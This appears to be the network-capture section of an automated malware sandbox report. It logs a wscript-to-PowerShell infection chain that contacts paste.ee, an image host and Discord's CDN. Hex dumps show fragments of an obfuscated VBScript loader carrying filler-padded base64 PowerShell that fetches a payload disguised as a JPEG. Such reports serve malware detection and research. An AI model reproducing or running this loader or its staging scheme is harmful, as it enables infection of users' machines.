                May 23, 2024 18:26:45.072374105 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.072484970 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.072494030 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.091052055 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.091073036 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.091149092 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.091172934 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.099657059 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.099766970 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.099795103 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.109778881 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.109802008 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.109904051 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.109927893 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.125051975 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.125109911 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.125154018 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:45.125174999 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.125206947 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.125206947 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:45.125526905 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:49.305646896 CEST49722443192.168.2.12162.159.129.233
                May 23, 2024 18:26:49.305708885 CEST44349722162.159.129.233192.168.2.12
                May 23, 2024 18:26:49.305802107 CEST49722443192.168.2.12162.159.129.233
                May 23, 2024 18:26:49.306071997 CEST49722443192.168.2.12162.159.129.233
                May 23, 2024 18:26:49.306090117 CEST44349722162.159.129.233192.168.2.12
                May 23, 2024 18:26:49.780662060 CEST44349722162.159.129.233192.168.2.12
                May 23, 2024 18:26:49.780831099 CEST49722443192.168.2.12162.159.129.233
                May 23, 2024 18:26:49.786138058 CEST49722443192.168.2.12162.159.129.233
                May 23, 2024 18:26:49.786154985 CEST44349722162.159.129.233192.168.2.12
                May 23, 2024 18:26:49.786468029 CEST44349722162.159.129.233192.168.2.12
                May 23, 2024 18:26:49.788180113 CEST49722443192.168.2.12162.159.129.233
                May 23, 2024 18:26:49.834503889 CEST44349722162.159.129.233192.168.2.12
                May 23, 2024 18:26:49.940773010 CEST44349722162.159.129.233192.168.2.12
                May 23, 2024 18:26:49.940850973 CEST44349722162.159.129.233192.168.2.12
                May 23, 2024 18:26:49.941037893 CEST49722443192.168.2.12162.159.129.233
                May 23, 2024 18:26:49.951802969 CEST49722443192.168.2.12162.159.129.233
                TimestampSource PortDest PortSource IPDest IP
                May 23, 2024 18:26:30.411020041 CEST6278753192.168.2.121.1.1.1
                May 23, 2024 18:26:30.422348976 CEST53627871.1.1.1192.168.2.12
                May 23, 2024 18:26:35.864756107 CEST5672053192.168.2.121.1.1.1
                May 23, 2024 18:26:36.188077927 CEST53567201.1.1.1192.168.2.12
                May 23, 2024 18:26:49.297739029 CEST5334053192.168.2.121.1.1.1
                May 23, 2024 18:26:49.304929972 CEST53533401.1.1.1192.168.2.12
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                May 23, 2024 18:26:30.411020041 CEST192.168.2.121.1.1.10x8e8Standard query (0)paste.eeA (IP address)IN (0x0001)false
                May 23, 2024 18:26:35.864756107 CEST192.168.2.121.1.1.10x9c53Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                May 23, 2024 18:26:49.297739029 CEST192.168.2.121.1.1.10x7be8Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                May 23, 2024 18:26:30.422348976 CEST1.1.1.1192.168.2.120x8e8No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                May 23, 2024 18:26:30.422348976 CEST1.1.1.1192.168.2.120x8e8No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                May 23, 2024 18:26:36.188077927 CEST1.1.1.1192.168.2.120x9c53No error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
                May 23, 2024 18:26:36.188077927 CEST1.1.1.1192.168.2.120x9c53No error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
                May 23, 2024 18:26:49.304929972 CEST1.1.1.1192.168.2.120x7be8No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                May 23, 2024 18:26:49.304929972 CEST1.1.1.1192.168.2.120x7be8No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                May 23, 2024 18:26:49.304929972 CEST1.1.1.1192.168.2.120x7be8No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                May 23, 2024 18:26:49.304929972 CEST1.1.1.1192.168.2.120x7be8No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                May 23, 2024 18:26:49.304929972 CEST1.1.1.1192.168.2.120x7be8No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                • paste.ee
                • uploaddeimagens.com.br
                • cdn.discordapp.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.1249716188.114.97.34436696C:\Windows\System32\wscript.exe
                TimestampBytes transferredDirectionData
                2024-05-23 16:26:31 UTC319OUTGET /d/umxfl HTTP/1.1
                Accept: */*
                Accept-Language: en-ch
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: paste.ee
                Connection: Keep-Alive
                2024-05-23 16:26:31 UTC1238INHTTP/1.1 200 OK
                Date: Thu, 23 May 2024 16:26:31 GMT
                Content-Type: text/plain; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cache-Control: max-age=2592000
                strict-transport-security: max-age=63072000
                x-frame-options: DENY
                x-content-type-options: nosniff
                x-xss-protection: 1; mode=block
                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GH1F5JKVyvHLFW3jTYPjo4nHXgUjfar67swj297%2Bm%2BK%2FblLN2Z9jj7GwfpSCW62x6%2By2siPmbQAGQGtK6Mc7Sje0lYod5Hah2tE63qb1jnUCTy1gQ%2FtTGgGz4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 888668791b3542eb-EWR
                alt-svc: h3=":443"; ma=86400
                2024-05-23 16:26:31 UTC131INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 69 6e 73 75 62 6a 75 67 61 64 6f 20 2c 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 2c 20 63 61 6d 69 74 61 20 2c 20 6d 61 73 73 6f 72 65 74 61 20 2c 20 6e 6f 69 76 6f 20 2c 20 43 61 6d 61 20 2c 20 6e 6f 69 76 6f 31 0d 0a 20 20 20 20 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 63 61 6d 69
                Data Ascii: 1f7f dim insubjugado , grafopsicologia , camita , massoreta , noivo , Cama , noivo1 grafopsicologia = " " cami
                2024-05-23 16:26:31 UTC1369INData Raw: 74 61 20 20 3d 20 22 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67
                Data Ascii: ta = "" & massoreta & grafopsicologia & massoreta & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDg
                2024-05-23 16:26:31 UTC1369INData Raw: 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 38 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22
                Data Ascii: BsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre"
                2024-05-23 16:26:31 UTC1369INData Raw: 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 49 44 67 54 72 65 42 39 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20
                Data Ascii: kDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & massoreta & grafopsicologia &
                2024-05-23 16:26:31 UTC1369INData Raw: 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 77 42 70 44 67 54 72 65 47 34 44 67 54 72 65 59 51 42 73 44 67 54 72 65 43 38 44 67 54 72 65 62 67 42 6c 44 67 54 72 65 48 63 44 67 54 72 65 58 77 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 4c 67 42 71 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 4d 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 34 44 67 54 72 65 44 49 44 67 54 72
                Data Ascii: " & massoreta & grafopsicologia & massoreta & "wBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTre" & massoreta & grafopsicologia & massoreta & "wDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTr
                2024-05-23 16:26:31 UTC1369INData Raw: 72 65 46 4d 44 67 54 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 51 67 42 35 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 51 42 7a 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44
                Data Ascii: reFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTre" & massoreta & grafopsicologia & massoreta & "QBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreD
                2024-05-23 16:26:31 UTC1095INData Raw: 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 54 77 42 6d 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 47 6b 44 67 54 72 65 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 67 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65
                Data Ascii: gia & massoreta & "DgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTre" & massoreta & grafopsicologia & massoreta & "DgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTre" & massoreta & grafopsicologia & massoreta & "gDgTregDgTreCgDgTreJDgTreBzDgTre
                2024-05-23 16:26:31 UTC1369INData Raw: 31 64 30 61 0d 0a 72 65 74 61 20 26 20 22 77 42 30 44 67 54 72 65 47 67 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 59 67 42 68 44 67 54 72 65 48 4d 44 67 54 72 65 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 54 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 77 42 30 44 67 54 72 65 47 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47
                Data Ascii: 1d0areta & "wB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTre" & massoreta & grafopsicologia & massoreta & "QDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTre" & massoreta & grafopsicologia & massoreta & "wB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG
                2024-05-23 16:26:31 UTC1369INData Raw: 38 44 67 54 72 65 62 51 42 43 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 54 44 67 54 72 65 48 51 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 77 44 67 54 72 65 6f 44 67 54 72 65 43 51 44 67 54 72 65 59 67 42 68 44 67 54 72 65 48 4d 44 67 54 72 65 22 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 67 72 61 66 6f 70 73 69 63 6f 6c 6f 67 69 61 20 26 20 6d 61 73 73 6f 72 65 74 61 20 26 20 22 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 51 77 42 76 44 67 54 72 65 47 30 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22
                Data Ascii: 8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTre" & massoreta & grafopsicologia & massoreta & "wDgTreoDgTreCQDgTreYgBhDgTreHMDgTre" & massoreta & grafopsicologia & massoreta & "QDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTre"
                2024-05-23 16:26:31 UTC1369INData Raw: 65 42 30 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72 65 42 6c 44 67 54 72 65 43 34 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 54 51 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 42 76 44 67 54 72 65 47 51 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 46 59 44 67 54 72 65 51 51 42 4a 44 67 54 72 65 43 63 44 67 54 72 65 4b 51 44 67 54 72 65 75 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 32 44 67 54 72 65 47 38 44 67 54 72 65 61 77 42 6c 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 75 44 67 54 72 65 48 55 44 67 54 72 65 62 44 67 54 72 65 42 73 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 47 38 44 67 54 72 65 59 67 42 71 44 67 54 72 65 47 55 44 67 54 72 65
                Data Ascii: eB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTre


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.1249720188.114.96.34436412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-05-23 16:26:36 UTC124OUTGET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1
                Host: uploaddeimagens.com.br
                Connection: Keep-Alive
                2024-05-23 16:26:37 UTC687INHTTP/1.1 200 OK
                Date: Thu, 23 May 2024 16:26:37 GMT
                Content-Type: image/jpeg
                Content-Length: 4198361
                Connection: close
                Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT
                ETag: "6627c3ad-400fd9"
                Cache-Control: max-age=2678400
                CF-Cache-Status: MISS
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=24p9UY4rS998pueSuKDvcxS1uaCnXx5iK8YDKYkezyGJqT39ajRxenS2ic7Thmv0FKMT9%2FkLK4ekULZvcjaXcnSVdxJ%2FTfOOh2JjwHsEgZm4Pyus3ZNi4s%2F7b1tG4a5K9EH%2FFWgYYDeD"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8886689c58be0fa7-EWR
                alt-svc: h3=":443"; ma=86400
                2024-05-23 16:26:37 UTC682INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                2024-05-23 16:26:37 UTC1369INData Raw: 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78
                Data Ascii: ccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.J9x
                2024-05-23 16:26:37 UTC1369INData Raw: e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47 2a 06 41
                Data Ascii: 2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A
                2024-05-23 16:26:37 UTC1369INData Raw: 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d
                Data Ascii: Lz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX}
